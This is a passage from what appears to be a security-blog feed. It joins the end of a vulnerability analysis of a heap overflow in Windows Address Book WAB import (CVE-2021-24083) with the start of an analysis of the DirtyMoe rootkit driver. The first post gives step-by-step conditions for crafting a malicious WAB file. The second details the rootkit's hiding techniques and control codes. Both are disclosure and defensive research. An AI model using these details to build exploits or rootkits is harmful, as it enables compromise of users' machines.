0x20        M        RecordProperties   Succession of subproperties belonging to the WAB record

The following fields are relevant:

The RecordProperties field is a succession of record property structures.
The PropertyCount field indicates the number of properties within the RecordProperties field.

Record properties can be either simple or composite.

Simple Properties

Simple properties have the following structure:

Offset      Length (bytes)    Field       Description
---------   --------------    ---------   -------------------
0x0         0x2               Tag         A property tag describing the type of the contents
0x2         0x2               Unknown     Unknown field
0x4         0x4               Size        Size in bytes of Value member (X)
0x8         X                 Value       Property value or content

Tags of simple properties are smaller than 0x1000, and include the following:

Tag Name        Tag Value    Length      Description
                             (bytes)
---------       -----------  ---------   -------------------
PtypInteger16   0x00000002   2           A 16-bit integer
PtypInteger32   0x00000003   4           A 32-bit integer
PtypFloating32  0x00000004   4           A 32-bit floating point number
PtypFloating64  0x00000005   8           A 64-bit floating point number
PtypBoolean     0x0000000B   2           Boolean, restricted to 1 or 0
PtypString8     0x0000001E   Variable    A string of multibyte characters in externally specified
                                         encoding with terminating null character (single 0 byte)
PtypBinary      0x00000102   Variable    A COUNT field followed by that many bytes
PtypString      0x0000001F   Variable    A string of Unicode characters in UTF-16LE format encoding
                                         with terminating null character (0x0000).
PtypGuid        0x00000048   16          A GUID with Data1, Data2, and Data3 filds in little-endian
PtypTime        0x00000040   8           A 64-bit integer representing the number of 100-nanosecond
                                         intervals since January 1, 1601
PtypErrorCode   0x0000000A   4           A 32-bit integer encoding error information

Note the following:

The aforementioned list is not exhaustive. For more property tag definitions, see this.
The value of PtypBinary is prefixed by a COUNT field, which counts 16-bit words.
In addition to the above, the following properties also exist; their usage in WAB is unknown.
- PtypEmbeddedTable (0x0000000D): The property value is a Component Object Model (COM) object.
- PtypNull (0x00000001): None: This property is a placeholder.
- PtypUnspecified (0x00000000): Any: this property type value matches any type;

Composite Properties

Composite properties have the following structure:

Offset  Length     Field             Description
        (bytes)
------  ---------  ----------------- -------------------
0x0     0x2        Tag               A property tag describing the type of the contents
0x2     0x2        Unknown           Unknown field
0x4     0x4        NestedPropCount   Number of nested properties contained in the current WAB property
0x8     0x4        Size              Size in bytes of Value member (X)
0xC     X          Value             Property value or content

Tags of composite properties are greater than or equal to 0x1000, and include the following:

Tag Name                Tag Value
---------               ----------
PtypMultipleInteger16   0x00001002
PtypMultipleInteger32   0x00001003
PtypMultipleString8     0x0000101E
PtypMultipleBinary      0x00001102
PtypMultipleString      0x0000101F
PtypMultipleGuid        0x00001048
PtypMultipleTime        0x00001040

The Value field of each composite property contains NestedPropCount number of Simple properties of the corresponding type.

In case of fixed-sized properties (PtypMultipleInteger16, PtypMultipleInteger32, PtypMultipleGuid, and PtypMultipleTime), the Value field of a composite property contains NestedPropCount number of the Value field of the corresponding Simple property.

For example, in a PtypMultipleInteger32 structure with NestedPropCount of 4:

The Size is always 16.
The Value contains four 32-bit integers.

In case of variable-sized properties (PtypMultipleString8, PtypMultipleBinary, and PtypMultipleString), the Value field of the composite property contains NestedPropCount number of Size and Value fields of the corresponding Simple property.

For example, in a PtypMultipleString structure with NestedPropCount of 2 containing the strings “foo” and “bar” in Unicode:

The Size is 14 00 00 00.
The Value field contains a concatenation of the following two byte-strings:
- “foo” encoded with a four-byte length: 06 00 00 00 66 00 6f 00 6f 00.
- “bar” encoded with a four-byte length: 06 00 00 00 62 00 61 00 72 00.

Technical Details

The vulnerability in question occurs when a malformed Windows Address Book in the form of a WAB file is imported. When a user attempts to import a WAB file into the Windows Address Book, the method WABObjectInternal::Import() is called, which in turn calls ImportWABFile(). For each contact inside the WAB file, ImportWABFile() performs the following nested calls: ImportContact(), CWABStorage::ReadRecord(), ReadRecordWithoutLocking(), and finally HrGetPropArrayFromFileRecord(). This latter function receives a pointer to a file as an argument and reads the contact header and extracts PropertyCount and DataLen. The function HrGetPropArrayFromFileRecord() in turn calls SecurityCheckPropArrayBuffer() to perform security checks upon the imported file and HrGetPropArrayFromBuffer() to read the contact properties into a property array.

The function HrGetPropArrayFromBuffer() relies heavily on the correctness of the checks performed by SecurityCheckPropArrayBuffer(). However, the function fails to implement security checks upon certain property types. Specifically, SecurityCheckPropArrayBuffer() may skip checking the contents of nested properties where the property tag is unknown, while the function HrGetPropArrayFromBuffer() continues to process all nested properties regardless of the security check. As a result, it is possible to trick the function HrGetPropArrayFromBuffer() into parsing an unchecked contact property. As a result of parsing such a property, the function HrGetPropArrayFromBuffer() can be tricked into overflowing a heap buffer.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

The following is the pseudocode of the function HrGetPropArrayFromFileRecord:

[1]

if ( !(unsigned int)SecurityCheckPropArrayBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3]) )
  {

[2]
    result = 0x8004011b;        // Error
    goto LABEL_25;              // Return prematurely
  }

[3]
  result = HrGetPropArrayFromBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3], 0, a7);

At [1] the function SecurityCheckPropArrayBuffer() is called to perform a series of security checks upon the buffer received and the properties contained within. If the check is positive, then the input is trusted and processed by calling HrGetPropArrayFromBuffer() at [3]. Otherwise, the function returns with an error at [2].

The following is the pseudocode of the function SecurityCheckPropArrayBuffer():

    __int64 __fastcall SecurityCheckPropArrayBuffer(unsigned __int8 *buffer_ptr, unsigned int buffer_length, int header_dword_3)
    {
      unsigned int security_check_result; // ebx
      unsigned int remaining_buffer_bytes; // edi
      int l_header_dword_3; // er15
      unsigned __int8 *ptr_to_buffer; // r9
      int current_property_tag; // ecx
      __int64 c_dword_2; // r8
      unsigned int v9; // edi
      int VA; // ecx
      int VB; // ecx
      int VC; // ecx
      int VD; // ecx
      int VE; // ecx
      int VF; // ecx
      int VG; // ecx
      int VH; // ecx
      signed __int64 res; // rax
      _DWORD *ptr_to_dword_1; // rbp
      unsigned __int8 *ptr_to_dword_0; // r14
      unsigned int dword_2; // eax
      unsigned int v22; // edi
      int v23; // esi
      int v24; // ecx
      unsigned __int8 *c_ptr_to_property_value; // [rsp+60h] [rbp+8h]
      unsigned int v27; // [rsp+68h] [rbp+10h]
      unsigned int copy_dword_2; // [rsp+70h] [rbp+18h]

      security_check_result = 0;
      remaining_buffer_bytes = buffer_length;
      l_header_dword_3 = header_dword_3;
      ptr_to_buffer = buffer_ptr;
      if ( header_dword_3 )                      
      {
        while ( remaining_buffer_bytes > 4 )        
        {

[4]

          if ( *(_DWORD *)ptr_to_buffer & 0x1000 )  
          {

[5]

            current_property_tag = *(unsigned __int16 *)ptr_to_buffer;
            if ( current_property_tag == 0x1102 ||                    
                 (unsigned int)(current_property_tag - 0x101E) <= 1 ) 
            {                         

[6]
                                      
              ptr_to_dword_1 = ptr_to_buffer + 4;                     
              ptr_to_dword_0 = ptr_to_buffer;
              if ( remaining_buffer_bytes < 0xC )                     
                return security_check_result;                         
              dword_2 = *((_DWORD *)ptr_to_buffer + 2);
              v22 = remaining_buffer_bytes - 0xC;
              if ( dword_2 > v22 )                                     
                return security_check_result;                         
              ptr_to_buffer += 12;
              copy_dword_2 = dword_2;
              remaining_buffer_bytes = v22 - dword_2;
              c_ptr_to_property_value = ptr_to_buffer;                
              v23 = 0;                                                
              if ( *ptr_to_dword_1 > 0u )
              {
                while ( (unsigned int)SecurityCheckSingleValue(
                                        *(_DWORD *)ptr_to_dword_0,
                                        &c_ptr_to_property_value,
                                        ©_dword_2) )
                {
                  if ( (unsigned int)++v23 >= *ptr_to_dword_1 )       
                  {                                                   
                    ptr_to_buffer = c_ptr_to_property_value;
                    goto LABEL_33;
                  }
                }
                return security_check_result;
              }
            }
            else                                                         
            {
             
[7]

              if ( remaining_buffer_bytes < 0xC )
                return security_check_result;
              c_dword_2 = *((unsigned int *)ptr_to_buffer + 2);       
              v9 = remaining_buffer_bytes - 12;
              if ( (unsigned int)c_dword_2 > v9 )                     
                return security_check_result;                         
              remaining_buffer_bytes = v9 - c_dword_2;
              VA = current_property_tag - 0x1002;                     
              if ( VA )
              {
                VB = VA - 1;
                if ( VB && (VC = VB - 1) != 0 )
                {
                  VD = VC - 1;
                  if ( VD && (VE = VD - 1) != 0 && (VF = VE - 1) != 0 && (VG = VF - 13) != 0 && (VH = VG - 44) != 0 )
                    res = VH == 8 ? 16i64 : 0i64;
                  else
                    res = 8i64;
                }
                else
                {
                  res = 4i64;
                }
              }
              else
              {
                res = 2i64;
              }
              if ( (unsigned int)c_dword_2 / *((_DWORD *)ptr_to_buffer + 1) != res ) 
                return security_check_result;                                        
                                                                                     

              ptr_to_buffer += c_dword_2 + 12;
            }
          }
          else                                     
          {                                        

[8]

            if ( remaining_buffer_bytes < 4 )       
              return security_check_result;
            v24 = *(_DWORD *)ptr_to_buffer;         
            c_ptr_to_property_value = ptr_to_buffer + 4;// new exe: v13 = buffer_ptr + 4;
            v27 = remaining_buffer_bytes - 4;       
            if ( !(unsigned int)SecurityCheckSingleValue(v24, &c_ptr_to_property_value, &v27) )
              return security_check_result;
            remaining_buffer_bytes = v27;
            ptr_to_buffer = c_ptr_to_property_value;
          }
    LABEL_33:
          if ( !--l_header_dword_3 )
            break;
        }
      }
      if ( !l_header_dword_3 )
        security_check_result = 1;
      return security_check_result;
    }

At [4] the tag of the property being processed is checked. The checks performed depend on whether the property processed in each iteration is a simple or a composite property. For simple properties (i.e, properties with tag lower than 0x1000), execution continues at [8]. The following checks are done for simple properties:

If the remaining number of bytes in the buffer is fewer than 4, the function returns with an error.
A pointer to the property value is obtained and SecurityCheckSingleValue() is called to perform a security check upon the simple property and its value. SecurityCheckSingleValue() performs a security check and increments the pointer to point at the next property in the buffer, so that SecurityCheckPropArrayBuffer() can check the next property on the next iteration.
The number of total properties is decremented and compared to zero. If equal to zero, then the function returns successfully. If different, the next iteration of the loop checks the next property.

Similarly, for composite properties (i.e, properties with tag equal or higher than 0x1000) execution continues at [5] and the following is done.

For variable length composite properties (if the property tag is equal to 0x1102 (PtypMultipleBinary) or equal or smaller than 0x101f (PtypMultipleString)), the code at [6] does the following:

The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
The Size field of the property is compared to the remaining buffer length to avoid overrunning the buffer.
For each nested property, the function SecurityCheckSingleValue() is called. It:
1. Performs a security check on the nested property.
2. Advances the pointer to the buffer held by the caller, in order to point to the next nested property.
The loop runs until the number of total properties in the contact (decremented in each iteration) is zero.

For fixed-length composite properties (if the property tag in question is different from 0x1102 (PtypMultipleBinary) and larger than 0x101f (PtypMultipleString)), the following happens starting at [7]:

The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
The Size is compared to the remaining buffer length to avoid overrunning the buffer.
The size of each nested property, which depends only on the property tag, is calculated from the parent property tag.
The Size is divided by NestedPropCount to obtain the size of each nested property.
The function returns with an error if the calculated subproperty size is different from the property size deduced from parent property tag.
The buffer pointer is incremented by the size of the parent property value to point to the next property.

Unknown or non-processable property types are assigned the nested property size 0x0.

It was observed that if the calculated property size is zero, the buffer pointer is advanced by the size of the property value, as described by the header. The buffer is advanced regardless of the property size and by advancing the buffer, the security check permits the value of the parent property (which may include subproperties) to stay unchecked. For the security check to pass the result of the division performed on Step 4 for fixed-length composite properties must be zero. Therefore for an unknown or non-processable property to pass the security check, NestedPropCount must be larger than Size. Note that since the size of any property in bytes is at least two, NestedPropCount must always be no larger than half of Size, and therefore, the aforementioned division must never be zero in benign cases.

After the checks have concluded, the function returns zero for a failed check and one for a passed check.

Subsequently, the function HrGetPropArrayFromFileRecord() calls HrGetPropArrayFromBuffer(), which aims to collect the properties into an array of _SPropValue structs and return it to the caller. The _SPropValue array has a length equal of the number of properties (as given by the contact header) and is allocated in the heap through a call to LocalAlloc(). The number of properties is multiplied by sizeof(_SPropValue) to yield the total buffer size. The following fragment shows the allocation taking place:

    if ( !property_array_r )
    {
        ret = -2147024809;
        goto LABEL_71;
    }
    *property_array_r = 0i64;
    header_dword_3_1 = set_to_zero + header_dword_3;

[9]

    if ( (unsigned int)header_dword_3_1 < header_dword_3       
      || (unsigned int)header_dword_3_1 > 0xAAAAAAA            
      || (v10 = (unsigned int)header_dword_3_1,                               
          property_array = (struct _SPropValue *)LocalAlloc(
                                                   0x40u,
                                                   0x18 * header_dword_3_1),
                                                   // sizeof(_SPropValue) * n_properties_in_binary
        (*property_array_r = property_array) == 0i64) )
    {
        ERROR_INSUFICIENT_MEMORY:
        ret = 0x8007000E;
        goto LABEL_71;
    }

An allocation of sizeof(_SPropValue) * n_properties_in_binary can be observed at [9]. Immediately after, each of the property structures are initialized and their property tag member is set to 1. After initialization, the buffer, on which security checks have already been performed, is processed property by property, advancing the property a pointer to the next property with the property header and value sizes provided by the property in question.

If the property processed by the specific loop iteration is a simple property, the following code is executed:

    if ( !_bittest((const signed int *)¤t_property_tag, 0xCu) )
    {
      if ( v16 < 4 )
        break;
      dword_1 = wab_ulong_buffer_full[1];
      ptr_to_dword_2 = (char *)(wab_ulong_buffer_full + 2);
      v38 = v16 - 4;
      if ( (unsigned int)dword_1 > v38 )
        break;
      current_property_tag = (unsigned __int16)current_property_tag;
      if ( (unsigned __int16)current_property_tag > 0xBu )
      {

[10]

        v39 = current_property_tag - 0x1E;
        if ( !v39 )
          goto LABEL_79;
        v40 = v39 - 1;
        if ( !v40 )
          goto LABEL_79;
        v41 = v40 - 0x21;
        if ( !v41 )
          goto LABEL_56;
        v42 = v41 - 8;
        if ( v42 )
        {
          if ( v42 != 0xBA )
            goto LABEL_56;
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_1);
          if ( !(*property_array_r)[p_idx].Value.bin.lpb )
            goto ERROR_INSUFICIENT_MEMORY;
          (*property_array_r)[p_idx].Value.l = dword_1;
          v44 = *(&(*property_array_r)[p_idx].Value.at + 1);
        }
        else
        {
    LABEL_79:

[11]
                                           
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.cur.int64 = (LONGLONG)LocalAlloc(0x40u, dword_1);
          v44 = (*property_array_r)[p_idx].Value.dbl;
          if ( v44 == 0.0 )
            goto ERROR_INSUFICIENT_MEMORY;
        }
        memcpy_0(*(void **)&v44, ptr_to_dword_2, v43);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[v43];
      }
      else
      {
    LABEL_56:               

[12]
           
        memcpy_0(&(*property_array_r)[v15].Value, ptr_to_dword_2, dword_1);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[dword_1];
      }
      remaining_bytes_to_process = v38 - dword_1;
      goto NEXT_PROPERTY;
    }

[Truncated]

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
          return 0;
      }

At [10] the property tag is extracted and compared with several constants. If the property tag is 0x1e (PtypString8), 0x1f (PtypString), or 0x48 (PtypGuid), then execution continues at [11]. If the property tag is 0x40 (PtypTime) or is not recognized, execution continues at [12]. The memcpy call at [12] is prone to a heap overflow.

Conversely, if the property being processed in the specific loop iteration is not a simple property, the following code is executed. Notably, when the following code is executed, the pointer DWORD* wab_ulong_buffer_full points to the property tag of the property being processed. Regardless of which composite property is being processed, before the property tag is identified the buffer is advanced to point to the beginning of the property value, which is at the 4th 32-bit integer.

[13]

    if ( v16 < 4 )
    break;
    c_dword_1 = wab_ulong_buffer_full[1];
    v19 = v16 - 4;
    if ( v19 < 4 )
    break;
    dword_2 = wab_ulong_buffer_full[2];
    wab_ulong_buffer_full += 3;                     

    remaining_bytes_to_process = v19 - 4;

[14]

    if ( (unsigned __int16)current_property_tag >= 0x1002u )
    {
    if ( (unsigned __int16)current_property_tag <= 0x1007u || (unsigned __int16)current_property_tag == 0x1014 )
        goto LABEL_80;
    if ( (unsigned __int16)current_property_tag == 0x101E )
    {
        [Truncated]
        
    }
    if ( (unsigned __int16)current_property_tag == 0x101F )
    {
        [Truncated]        
    }
    if ( ((unsigned __int16)current_property_tag - 0x1040) & 0xFFFFFFF7 )
    {
        if ( (unsigned __int16)current_property_tag == 0x1102 )
        {
        [Truncated]
        }
    }
    else
    {
    LABEL_80:

[15]

        (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_2);
        if ( !(*property_array_r)[p_idx].Value.bin.lpb )
        goto ERROR_INSUFICIENT_MEMORY;
        (*property_array_r)[p_idx].Value.l = c_dword_1;
        if ( (unsigned int)dword_2 > remaining_bytes_to_process )
        break;
        memcpy_0((*property_array_r)[p_idx].Value.bin.lpb, wab_ulong_buffer_full, dword_2);
        wab_ulong_buffer_full = (ULONG *)((char *)wab_ulong_buffer_full + dword_2);
        remaining_bytes_to_process -= dword_2;
    }
    }

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
        return 0;
    }

After the buffer has been advanced at [13], the property tag is compared with several constants starting at [14]. Finally, the code fragment at [15] attempts to process a composite property (i.e. >= 0x1000) with a tag not contemplated by the previous constants.

Although the processing logic of each type of property is irrelevant, an interesting fact is that if the property tag is not recognized, the buffer pointer has still been advanced to the end of the end of its header, and it’s never retracted. This happens if all of the following conditions are met:

The property tag is larger or equal than 0x1002.
The property tag is larger than 0x1007.
The property tag is different from 0x1014.
The property tag is different from 0x101e.
The property tag is different from 0x101f.
The property tag is different from 0x1102.
The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is nonzero.

Interestingly, if all of the above conditions are met, the property header of the composite property is skipped, and the next loop iteration will interpret its property body as a different property.

Therefore, it is possible to overflow the _SPropValue array allocated in the heap by HrGetPropArrayFromBuffer() by using the following observations:

A specially crafted composite unknown or non-processable property can be made to bypass security checks if NestedPropCount is larger than Size.
HrGetPropArrayFromBuffer() can be made to interpret the Value of a specially crafted property as a separate property.

Proof-of-Concept

In order to create a malicious WAB file from a benign WAB file, export a valid WAB file from an instance of the Windows Address Book. It is noted that Outlook Express on Windows XP includes the ability to export contacts as a WAB file.

The benign WAB file can be modified to make it malicious by altering a contact inside it to have the following characteristics:

A nested property containing the following:
A tag of an unknown or unprocessable type, for example the tag 0x1058, with the following conditions:
- Must be larger or equal than 0x1002.
- Must be larger than 0x1007.
- Must be different from 0x1014, 0x101e, 0x101f, and 0x1102.
- The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is non-zero.
- Must be different from 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1014, 0x1040, and 0x1048.
- NestedPropCount is larger than Size.
- The Value of the composite property is empty.
- A malicious simple property containing the following:
- A property tag different from 0x1e, 0x1f, 0x40 and 0x48. For example, the tag 0x0.
- The Size value is larger than 0x18 x NestedPropCount in order to overflow the _SPropValue array buffer.
- An unspecified number of trailing bytes, that will overflow the _SPropValue array buffer.

Finally, when an attacker tricks an unsuspecting user into importing the specially crafted WAB file, the vulnerability is triggered and code execution could be achieved. Failed exploitation attempts will most likely result in a crash of the Windows Address Book Import Tool.

Due to the presence of ASLR and a lack of a scripting engine, we were unable to obtain arbitrary code execution in Windows 10 from this vulnerability.

Conclusion

Hopefully you enjoyed this dive into CVE-2021-24083, and if you did, go ahead and check out our other blog post on a use-after-free vulnerability in Adobe Acrobat Reader DC. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book appeared first on Exodus Intelligence.

DirtyMoe: Rootkit Driver

Avast Threat Labs

Martin Chlumecký

11 August 2021 at 09:44

Abstract

In the first post DirtyMoe: Introduction and General Overview of Modularized Malware, we have described one of the complex and sophisticated malware called DirtyMoe. The main observed roles of the malware are Cryptojacking and DDoS attacks that are still popular. There is no doubt that malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems where the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is using rootkits. In general, the main goal of the rootkits is to hide itself and other modules of the hosted malware on the kernel layer. The rootkits are potent tools but carry a high risk of being detected because the rootkits work in the kernel-mode, and each critical bug leads to BSoD.

The primary aim of this next article is to analyze rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of a DirtyMoe driver, aiming to provide complex information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities on kernel and user mode. Moreover, the driver can execute commands received from the user-mode under the kernel privileges. Another significant aspect of the driver is an injection of an arbitrary DLL file into targeted processes. Last but not least is the driver’s functionality that censors the file system content. In the same way, we describe the refined routine that deploys the driver into the kernel and which anti-forensic method the malware authors used.

Another essential point of this research is the investigation of the driver’s meta-data, which showed that the driver is code-signed with the certificates that have been stolen and revoked in the past. However, the certificates are widespread in the wild and are misused in other malicious software in the present.

Finally, the last part summarises the rootkit functionally and draws together the key findings of digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a windows driver that DirtyMoe drops on the system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the samples as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information

File Type: Portable Executable 64
File Info: Microsoft Visual C++ 8.0 (Driver)
File Size: 116.04 KB (118824 bytes)
Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)

Imports

The driver imports two libraries FltMgr and ntosrnl. Table 1 summarizes the most suspicious methods from the driver’s point.

Routine	Description
`FltSetCallbackDataDirty`	A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
`FltGetRequestorProcessId`	Routine returns the process ID for the process requested for a given I/O operation.
`FltRegisterFilter`	FltRegisterFilter registers a minifilter driver.
`ZwDeleteValueKey` `ZwSetValueKey` `ZwQueryValueKey` `ZwOpenKey`	Routines delete, set, query, and open registry entries in kernel-mode.
`ZwTerminateProcess`	Routine terminates a process and all of its threads in kernel-mode.
`ZwQueryInformationProcess`	Retrieves information about the specified process.
`MmGetSystemRoutineAddress`	Returns a pointer to a function specified by a routine parameter.
`ZwAllocateVirtualMemory`	Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.

Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routine via MmGetSystemRoutineAddress() as a form of obfuscation since the string table contains routine names operating with VirtualMemory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel-routine ZwQueryInformationProcess() and strings such as services.exe, winlogon.exe point out that the rootkit probably works with kernel structures of the critical windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions originally needed with high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in the user-mode just sends a defined control code, and data to the driver and it provides higher privilege actions.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function	Description
Driver Entry	routine called by the kernel when the driver is loaded.
Start Routine	is run as a kernel thread restoring the driver configuration from the system registry.
Device Control	processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver	routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification	routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver	wraps the original callback of the NTFS driver for `IRP_MJ_CREATE` major function.
Registry Hiding	is hook method provides registry key hiding.
Service Hiding	is a routine hiding a defined service.
Driver Hiding	is a routine hiding a defined driver.
Driver Unload	routine is called by kernel when the driver is unloaded.

Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after driver loading. The driver initializes a large number of global variables for the proper operation of the driver. Firstly, the driver detects the OS version and setups required offsets for further malicious use. Secondly, the variable for pointing of the driver image is initialized. The driver image is used for hiding a driver. The driver also associates the following major functions:

IRP_MJ_CREATE, IRP_MJ_CLOSE – no interest action,
IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows it to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors a kernel process creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL	Description
0x222C80	The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and authorization code equal `0xB6C7C230`.
0x2224C0	The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes. used variable: regKey, regValue, regData, regType
0x222960	This IOCTL clears all data stored by the driver. used variable: see Setting* and Inserting variables*
0x2227EC	If the malware needs to hide a specific driver, the driver adds a specific driver name to the listBaseDllName and hides it using Driver Hiding.
0x2227E8	The driver adds the name of the registry key to the WinDeviceAddress list and hides this key using Registry Hiding. used variable: WinDeviceAddress
0x2227F0	The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC	If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel `GetCellRoutine()`.
0x222004	The malware sends a process ID that wants to terminate. The driver calls kernel function `ZwTerminateProcess()` and terminates the process and all of its threads regardless of malware privileges.
0x2224C8	The malware sends data which driver writes to the file defined by filePath variable; see Setting control codes used variable: filePath, fileData

Table 3. Controlling IOCTLs

Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list	Variable	Purpose
Registry HIVE	WinDeviceAddress	Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name	WinDeviceMaker	Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
	WinDeviceMakerB	Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
	WinDeviceMakerOnly	Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names (full path)	WinDeviceName WinDeviceNameB	Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requested process is also whitelisted, the driver grants access to the file.
	WinDeviceNameOnly	Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names (containing number)	WinDeviceNumber	Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: `[A-Z][a-z][0-9]+\.[a-z]{3}`. So, a file name includes a number.
Process ID	ListProcessId1	Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
	ListProcessId2	The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
